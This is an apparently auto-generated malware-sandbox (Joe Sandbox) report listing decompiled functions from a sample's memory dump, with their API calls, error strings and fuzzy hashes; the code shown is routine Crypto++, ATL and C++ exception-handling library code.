__EH_prolog3_GS.LIBCMT ref: 00E4DB5B

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4DBDC

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4DB86

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 20c82573768744fab51d4e49de57602ead92dc847fafc7794c9e164fa614a6e8
Instruction ID: f896d50462be4bdfb9d64b4ee51173b964379b06704a80690d8774d55a43506c
Opcode Fuzzy Hash: 20c82573768744fab51d4e49de57602ead92dc847fafc7794c9e164fa614a6e8
Instruction Fuzzy Hash: 31018475940318BBDF10EBA4DC46FCEBBBCAF26309F104085F905B3241CAB49A88D761

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DC81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DC8B

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4DD0C

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

: missing required parameter ', xrefs: 00E4DCB6

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: : missing required parameter '
API String ID: 1139647276-3853945970
Opcode ID: 681ae195718c69632e1bc511c6a6c1ab8cc476eafc7c8adcfaad27ee7ba53292
Instruction ID: 294d8051bc6c9a4f2a972b985666986f64ed1003252a7a5f006e99b5ecd0031b
Opcode Fuzzy Hash: 681ae195718c69632e1bc511c6a6c1ab8cc476eafc7c8adcfaad27ee7ba53292
Instruction Fuzzy Hash: 23018475D40319BADF10EBA4DC46FCEBBBCAF25309F104185F909B3242CA749B889761

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5B15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00CA5B15(intOrPtr* __ecx) {
				void* _t19;
				intOrPtr _t20;
				intOrPtr* _t30;
				intOrPtr _t34;
				intOrPtr* _t35;
				void* _t36;

				0xe21503(0x44);
				_t35 = __ecx;
				_t34 =  *((intOrPtr*)(_t36 + 8));
				if( *((char*)(_t36 + 0xc)) != 0 &&  *((intOrPtr*)( *__ecx + 0xbc))() == 0) {
					E00CA1E2C(_t36 - 0x28, "Unflushable<T>: this object has buffered input that cannot be flushed");
					 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
					E00CA4197(_t36 - 0x50);
					 *((intOrPtr*)(_t36 - 0x50)) = 0xe92cc0;
					0xe2143b(_t36 - 0x50, 0xee8150, 2, _t36 - 0x28);
				}
				_t30 =  *((intOrPtr*)( *_t35 + 0xa4))();
				if(_t30 == 0) {
					L6:
					_t19 = 0;
				} else {
					_t20 =  *((intOrPtr*)(_t36 + 0x10));
					if(_t20 == 0) {
						goto L6;
					} else {
						_t19 =  *((intOrPtr*)( *_t30 + 0x90))(_t34,  *((intOrPtr*)(_t36 + 0xc)), _t20 - 1,  *((intOrPtr*)(_t36 + 0x14)));
					}
				}
				0xe214b2();
				return _t19;
			}

0x00ca5b1c
0x00ca5b21
0x00ca5b27
0x00ca5b2a
0x00ca5b40
0x00ca5b45
0x00ca5b52
0x00ca5b5f
0x00ca5b67
0x00ca5b67
0x00ca5b76
0x00ca5b7a
0x00ca5b96
0x00ca5b96
0x00ca5b7c
0x00ca5b7c
0x00ca5b81
0x00000000
0x00ca5b83
0x00ca5b8e
0x00ca5b8e
0x00ca5b81
0x00ca5b98
0x00ca5b9d

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5B1C

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5B67

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

Unflushable<T>: this object has buffered input that cannot be flushed, xrefs: 00CA5B38

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: Unflushable<T>: this object has buffered input that cannot be flushed
API String ID: 1139647276-3781273281
Opcode ID: 2e1cc7b333a533a76278985f90dd3e0cb88e2aacca18f7a0779b3e4076e0b4e0
Instruction ID: 912816084cf7ccdc803cf9d1088e6dc0ea93239ddd6a5466b758e46d2ae3defd
Opcode Fuzzy Hash: 2e1cc7b333a533a76278985f90dd3e0cb88e2aacca18f7a0779b3e4076e0b4e0
Instruction Fuzzy Hash: 78018C74A00609EFDF00EFA0C805FED77B4AF55305F088468F816AB282CBB0DA058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00E4BC7F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E4BC86

Part of subcall function 00E4BBDB: __EH_prolog3.LIBCMT ref: 00E4BBE2

Part of subcall function 00E4B7B5: __EH_prolog3.LIBCMT ref: 00E4B7BC

Part of subcall function 00CA2FD4: __EH_prolog3.LIBCMT ref: 00CA2FDB

Part of subcall function 00E4CB55: __EH_prolog3_GS.LIBCMT ref: 00E4CB5C

Strings

TruncatedDigestSize, xrefs: 00E4BCE9
HashVerificationFilterFlags, xrefs: 00E4BCCC

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$H_prolog3_
String ID: HashVerificationFilterFlags$TruncatedDigestSize
API String ID: 4240126716-2207988728
Opcode ID: 1ee60265a7af7b24bf5dbb17a2f63451137e2c1426fa904f50a87e78bf4106ef
Instruction ID: 894315aa23840cf5d29470fb0e47668d52d89fc6212064b7bb1940bcbe1a9393
Opcode Fuzzy Hash: 1ee60265a7af7b24bf5dbb17a2f63451137e2c1426fa904f50a87e78bf4106ef
Instruction Fuzzy Hash: 531184B0904758AEC719EF58D842A9EBBF4EF14304F00449EF44AB7342D7B496419B65

Uniqueness

Uniqueness Score: -1.00%

Function 00CA436E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00CA436E(intOrPtr* __ecx, void* __eflags) {
				void* _t12;
				void* _t14;
				intOrPtr* _t29;
				void* _t31;

				0xe21503(0x4c);
				_t29 = __ecx;
				_t24 = _t31 - 0x58;
				_t12 = E00CA1E2C(_t31 - 0x58, "AlgorithmParametersBase: parameter \"");
				 *((intOrPtr*)(_t31 - 4)) = 0;
				_t14 = E00CA2ED4(0, _t31 - 0x58, _t31 - 0x28, _t12,  *((intOrPtr*)(_t31 + 8)));
				 *((char*)(_t31 - 4)) = 1;
				 *((char*)(_t31 - 4)) = 2;
				E00CA4197(_t29);
				E00CA23D6(_t31 - 0x40, 1, 0);
				E00CA23D6(_t31 - 0x28, 1, 0);
				E00CA23D6(_t31 - 0x58, 1, 0);
				 *_t29 = 0xe92e34;
				0xe214b2(6, E00CA2ED4(0, _t24, _t31 - 0x40, _t14, "\" not used"));
				return _t29;
			}

0x00ca4375
0x00ca437a
0x00ca437f
0x00ca4387
0x00ca4394
0x00ca4397
0x00ca43a5
0x00ca43b7
0x00ca43bb
0x00ca43c6
0x00ca43d1
0x00ca43dc
0x00ca43e1
0x00ca43e9
0x00ca43ee

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA4375

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

Part of subcall function 00CA23D6: _memmove.LIBCMT ref: 00CA23F6

Strings

" not used, xrefs: 00CA439C
AlgorithmParametersBase: parameter ", xrefs: 00CA4382

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3H_prolog3__memmove
String ID: " not used$AlgorithmParametersBase: parameter "
API String ID: 2549280591-612349224
Opcode ID: 2a65944465b9d458c0a37d8fa044ba130a377a6170efcd97aff702b74d9d1cca
Instruction ID: 4b6cbe18cc44be5fa84bbf35bb24d279b59d0076bdf11f1fe3b9d786958e37b7
Opcode Fuzzy Hash: 2a65944465b9d458c0a37d8fa044ba130a377a6170efcd97aff702b74d9d1cca
Instruction Fuzzy Hash: 02018F71900219AADF04EBA4CC82FEE7A6CAF65308F041058F605BB182DBF44E849761

Uniqueness

Uniqueness Score: -1.00%

Function 00CA44D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00CA44D9(intOrPtr* __ecx, void* __eflags) {
				void* _t18;
				void* _t33;
				intOrPtr* _t36;
				void* _t37;

				0xe214d0(0x24);
				_t36 = __ecx;
				0xe49b4b(0);
				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
				 *((char*)(__ecx + 0x10)) = 0;
				 *__ecx = 0xe9302c;
				 *((intOrPtr*)(__ecx + 4)) = 0xe930e4;
				_t18 = E00CA40CA(_t37 - 0x30);
				 *(_t37 - 4) = 0;
				 *(_t37 - 4) = 1;
				0xe4d8b2(E00CA315F(), _t37 - 0x18, "InputBuffer", _t18, 1,  *((intOrPtr*)(_t37 + 8)), 0);
				 *(_t37 - 4) = 0;
				E00CA4C1B(_t37 - 0x14);
				_t33 =  *(_t37 - 0x1c);
				 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
				memset(_t33, 0,  *(_t37 - 0x20) << 0);
				0xe4b574(_t33);
				0xe2149e();
				return _t36;
			}

0x00ca44e0
0x00ca44e5
0x00ca44ea
0x00ca44ef
0x00ca44fa
0x00ca44fd
0x00ca4503
0x00ca450a
0x00ca4515
0x00ca4529
0x00ca452d
0x00ca4535
0x00ca4538
0x00ca453d
0x00ca4547
0x00ca454b
0x00ca454e
0x00ca4556
0x00ca455b

APIs

__EH_prolog3.LIBCMT ref: 00CA44E0

Part of subcall function 00E49B4B: __EH_prolog3_GS.LIBCMT ref: 00E49B55
Part of subcall function 00E49B4B: __CxxThrowException@8.LIBCMT ref: 00E49BB4

Part of subcall function 00CA40CA: __EH_prolog3.LIBCMT ref: 00CA40D1

Part of subcall function 00CA315F: __EH_prolog3.LIBCMT ref: 00CA3166

Part of subcall function 00E4D8B2: __EH_prolog3_GS.LIBCMT ref: 00E4D8B9
Part of subcall function 00E4D8B2: __CxxThrowException@8.LIBCMT ref: 00E4D91A

Strings

InputBuffer, xrefs: 00CA4518
0, xrefs: 00CA4503

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$Exception@8H_prolog3_Throw
String ID: InputBuffer$0
API String ID: 605474211-1687221730
Opcode ID: a5eaedab8f0551a300b8f05f1c2c83ea4bf9c9a15ce5cf1663a831e8b90affbb
Instruction ID: ad78e0ad9f57a932fd510ba5c81fc331c58c884321e5376a4a7cbce35580199a
Opcode Fuzzy Hash: a5eaedab8f0551a300b8f05f1c2c83ea4bf9c9a15ce5cf1663a831e8b90affbb
Instruction Fuzzy Hash: BF01B170900309EECB14EBB49842A9EBAA4AF64324F109649B165732C2CBB49B05DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6972 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CA6972(intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, short _a8) {
				signed int _v0;
				intOrPtr _v8;
				short _t24;
				intOrPtr _t25;
				void* _t27;
				signed int _t34;
				intOrPtr* _t37;

				_t37 = __ecx;
				_t34 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t34 != 0) {
					if(_t34 > 0x7fffffff) {
						0xe48b37("vector<T> too long");
						asm("int3");
						_t32 = __ecx;
						if(_v8 != 1) {
							if( *((intOrPtr*)(__ecx + 0x14)) >= 8) {
								_t32 =  *__ecx;
							}
							return E00CAB5A8(_t32 + _v0 * 2, _a8, _a4);
						} else {
							if( *((intOrPtr*)(__ecx + 0x14)) >= 8) {
								_t32 =  *__ecx;
							}
							_t24 = _a8;
							 *((short*)(_t32 + _v0 * 2)) = _t24;
							return _t24;
						}
					}
					_push(0);
					_t25 = E00CA3233(_t34);
					 *_t37 = _t25;
					 *((intOrPtr*)(_t37 + 4)) = _t25;
					 *((intOrPtr*)(_t37 + 8)) = _t25 + _t34 * 2;
					_t27 = 1;
				} else {
					_t27 = 0;
				}
				return _t27;
			}

0x00ca6976
0x00ca697b
0x00ca697e
0x00ca6980
0x00ca6983
0x00ca6988
0x00ca6994
0x00ca69b7
0x00ca69bc
0x00ca69c4
0x00ca69c6
0x00ca69e1
0x00ca69e3
0x00ca69e3
0x00000000
0x00ca69c8
0x00ca69cc
0x00ca69ce
0x00ca69ce
0x00ca69d3
0x00ca69d7
0x00000000
0x00ca69d7
0x00ca69c6
0x00ca6996
0x00ca6998
0x00ca699d
0x00ca699f
0x00ca69a6
0x00ca69a9
0x00ca698a
0x00ca698a
0x00ca698a
0x00ca69af

APIs

_Allocate.LIBCPMT ref: 00CA6998
std::_Xinvalid_argument.LIBCPMT ref: 00CA69B7

Part of subcall function 00E48B37: std::exception::exception.LIBCMT ref: 00E48B4A
Part of subcall function 00E48B37: __CxxThrowException@8.LIBCMT ref: 00E48B5F

Strings

vector<T> too long, xrefs: 00CA69B2

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocateException@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long
API String ID: 2227214630-3788999226
Opcode ID: 5a4603d178e44a35e4bd09fcbe3f83af0888b9251c69014a408794f542c0ba1c
Instruction ID: 750adda0f69a17c22ee6ac16cbcc029fa7505ef631f615b16fe02cc297789121
Opcode Fuzzy Hash: 5a4603d178e44a35e4bd09fcbe3f83af0888b9251c69014a408794f542c0ba1c
Instruction Fuzzy Hash: A6F0A072404306AF8720DF39D40156BB7E8DEA6770320843FE9A9C7740EA31A94147A4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA60D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00CA60D0() {
				void* _t18;
				void* _t22;

				0xe21503(0x44);
				E00CA1E2C(_t22 - 0x28, "RandomNumberGenerator: IncorporateEntropy not implemented");
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				_t18 = _t22 - 0x50;
				E00CA4197(_t18);
				 *((intOrPtr*)(_t22 - 0x50)) = 0xe92cb4;
				0xe2143b(_t22 - 0x50, 0xee8098, 0, _t22 - 0x28);
				asm("int3");
				goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t18 + 0xfffffffc)) + 0x48))())) + 0x28)));
			}

0x00ca60d7
0x00ca60e4
0x00ca60e9
0x00ca60f3
0x00ca60f6
0x00ca6103
0x00ca610b
0x00ca6110
0x00ca611d

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA60D7

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA610B

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 00CA60DC

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1139647276-49352013
Opcode ID: 85e8114903292c56232e2cb9fa2f8a2e9613649d5ff90edc55647e6246cf82a0
Instruction ID: 2441470c83c365441358be75fc6cf32700013ddca7cf2a14e871e1a501782a4f
Opcode Fuzzy Hash: 85e8114903292c56232e2cb9fa2f8a2e9613649d5ff90edc55647e6246cf82a0
Instruction Fuzzy Hash: 68F03974A40218EFDF04EBE4C856BDD73B4AF59314F2021A8F615BB2A1DBB09A49CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00CA664A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00CA664A(void* __ecx) {
				intOrPtr _t11;
				void* _t18;

				0xe21503(0x44);
				_t11 =  *((intOrPtr*)(_t18 + 8));
				if(_t11 != 0 && _t11 !=  *((intOrPtr*)(__ecx + 0x10))) {
					E00CA1E2C(_t18 - 0x28, "CipherModeBase: feedback size cannot be specified for this cipher mode");
					 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
					E00CA4197(_t18 - 0x50);
					_t11 = _t18 - 0x50;
					 *((intOrPtr*)(_t18 - 0x50)) = 0xe92ca8;
					0xe2143b(_t11, 0xee8078, 1, _t18 - 0x28);
				}
				0xe214b2();
				return _t11;
			}

0x00ca6651
0x00ca6656
0x00ca665b
0x00ca666a
0x00ca666f
0x00ca667c
0x00ca6686
0x00ca6689
0x00ca6691
0x00ca6691
0x00ca6696
0x00ca669b

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA6651

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA6691

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

CipherModeBase: feedback size cannot be specified for this cipher mode, xrefs: 00CA6662

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: CipherModeBase: feedback size cannot be specified for this cipher mode
API String ID: 1139647276-2561568580
Opcode ID: 53767683ac165da746ca80823484383bae2f436127b866cdc6c7e8f7b78c5b12
Instruction ID: ff433aed89dc835f5c42f32d48600848a6459ae7be463aefeec5c820f824a289
Opcode Fuzzy Hash: 53767683ac165da746ca80823484383bae2f436127b866cdc6c7e8f7b78c5b12
Instruction Fuzzy Hash: 3BF03971A40318AADF10FAE0C842FDC73B4AF24705F542454F929FA081DBB0EA49CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E485AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E485FE: _memset.LIBCMT ref: 00E4860B

Part of subcall function 00CA213B: InitializeCriticalSectionAndSpinCount.KERNEL32(00F11814,00000000,00F11800,00E485DA,?,?,?,00CA1C23), ref: 00CA2140
Part of subcall function 00CA213B: GetLastError.KERNEL32(?,?,?,00CA1C23), ref: 00CA214A

IsDebuggerPresent.KERNEL32(?,?,?,00CA1C23), ref: 00E485DE
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00CA1C23), ref: 00E485ED

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E485E8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 436010757-631824599
Opcode ID: 80b58cf8195329a42e14b12cbfb6e4825ce31475b09c37b0a020c24be444429c
Instruction ID: 0293a85c8bbf943b66afc13c76097bc6d92a3a0af7583d1d1bfd8f0ca69ae85d
Opcode Fuzzy Hash: 80b58cf8195329a42e14b12cbfb6e4825ce31475b09c37b0a020c24be444429c
Instruction Fuzzy Hash: C0E09270200711CFE7609F69EA047467BE0BF05748F04492DE586E3750DBB9E948CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E512AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E512B5

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E512F2

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

AllocatorBase: requested size would cause integer overflow, xrefs: 00E512C3

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

